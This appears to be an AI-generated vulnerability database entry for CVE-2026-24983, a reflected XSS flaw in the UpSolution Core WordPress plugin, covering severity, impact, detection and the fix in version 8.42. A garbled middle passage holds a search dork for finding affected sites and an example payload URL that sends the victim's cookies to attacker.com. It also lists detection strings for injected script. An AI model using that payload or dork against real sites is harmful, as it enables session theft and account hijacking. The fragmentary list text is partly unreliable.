
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-24983 is a Reflected Cross-Site Scripting (XSS) vulnerability in the UpSolution Core WordPress plugin (also known as us-core). It affects all versions through 8.41 and was discovered by Ananda Dhakal of Patchstack, reported on December 18, 2025, and published on March 25, 2026. The vulnerability carries a CVSS v3.1 base score of 7.1 (Medium/High) (Patchstack).
The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-site Scripting) and stems from insufficient sanitization of user-supplied input that is reflected back in the web page response without proper encoding. An unauthenticated remote attacker can craft a malicious URL containing injected JavaScript; when a privileged or authenticated user clicks the link, the script executes in their browser within the context of the affected site. No authentication is required on the attacker's side, but user interaction (e.g., clicking a crafted link) is necessary for successful exploitation (Patchstack).
Successful exploitation allows attackers to execute arbitrary JavaScript in the victim's browser session, enabling session cookie theft, account hijacking, credential harvesting, and performing unauthorized actions on behalf of the victim. Because the scope is changed (S:C in the CVSS vector), the injected script can affect resources beyond the vulnerable component itself, such as other browser-accessible data or third-party services. Patchstack notes that vulnerabilities of this type are commonly used in mass-exploit campaigns targeting thousands of WordPress sites regardless of their size or traffic (Patchstack).
No public proof-of-concept exploit code or confirmed in-the-wild exploitation has been reported at this time. The EPSS score is approximately 0.033%, indicating a low but non-negligible probability of exploitation in the near term. The vulnerability does not appear in the CISA Known Exploited Vulnerabilities (KEV) catalog. Patchstack has issued a virtual patch (mitigation rule) to block exploitation attempts for users of its platform (Patchstack).
inurl:wp-content/plugins/us-core).https://target-site.com/?vulnerable_param=<script>document.location='https://attacker.com/steal?c='+document.cookie</script>.<script>, onerror=, onload=) in query parameters associated with the us-core plugin; outbound requests from victim browsers to unknown external domains shortly after page load.%3Cscript%3E, javascript:) in parameters handled by the UpSolution Core plugin; referrer headers pointing to crafted external URLs.wp-content/plugins/us-core/ that may indicate post-exploitation tampering.The vendor has released version 8.42 of the UpSolution Core plugin, which resolves this vulnerability. Site administrators should update to version 8.42 or later immediately via the WordPress plugin dashboard. As a temporary measure, Patchstack users can enable the platform's virtual patch rule to block exploitation attempts until the plugin is updated. If neither option is immediately available, consider disabling the plugin until patching is feasible (Patchstack).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."